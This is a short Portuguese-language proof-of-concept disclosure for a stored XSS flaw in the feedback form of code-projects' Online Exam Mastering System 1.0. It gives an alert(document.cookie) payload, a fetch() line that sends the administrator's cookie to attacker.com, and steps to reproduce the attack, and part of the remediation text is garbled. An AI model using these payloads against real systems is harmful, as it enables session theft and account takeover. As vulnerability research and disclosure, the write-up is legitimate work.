
PoC para o CVE-2025-46173
CVE-2025-46173 é uma vulnerabilidade de Cross-Site Scripting (XSS) armazenado descoberta no Online Exam Mastering System 1.0 da code-projects. A vulnerabilidade existe no componente feedback.php, onde a entrada do usuário no campo de nome não é devidamente sanitizada, permitindo que um agente malicioso injete JavaScript arbitrário. Quando um administrador visualiza esse feedback no painel administrativo (dash.php), o payload é executado no navegador do administrador, levando ao sequestro de sessão e à potencial escalada de privilégios.
feedback.php, dash.phpUm usuário envia o seguinte payload no campo Nome do formulário de feedback:
<script>alert(document.cookie)</script>

Quando o administrador visualiza posteriormente o feedback enviado em dash.php, o payload é executado:

O cookie de sessão do administrador é exposto por meio de document.cookie, que pode ser exfiltrado:
<script>
fetch("http://attacker.com/steal?cookie=" + document.cookie);
</script>
Clone ou configure a versão vulnerável a partir de code-projects.
Navegue até localhost/exam/feedback.php.
Preencha o campo "Nome" com:
<script>alert(document.cookie)</script>
Envie o formulário.
Faça login como administrador e visite dash.php?q=3 para visualizar o feedback.
O script será executado no contexto do administrador.
A exploração bem-sucedida permite que um atacante remoto:
&, <, >, ").htmlspecialchars() do PHP, ou uma combinação de validação no frontend + sanitização no backend.Pruthu Raut LinkedIn | TryHackMe Top 2% | GitHub
As capturas de tela são apenas para fins educacionais. Todos os testes foram realizados em um ambiente local.
Estas informações são fornecidas apenas para fins educacionais e de pesquisa. Não as utilize em sistemas que você não possui ou para os quais não tenha permissão explícita de teste.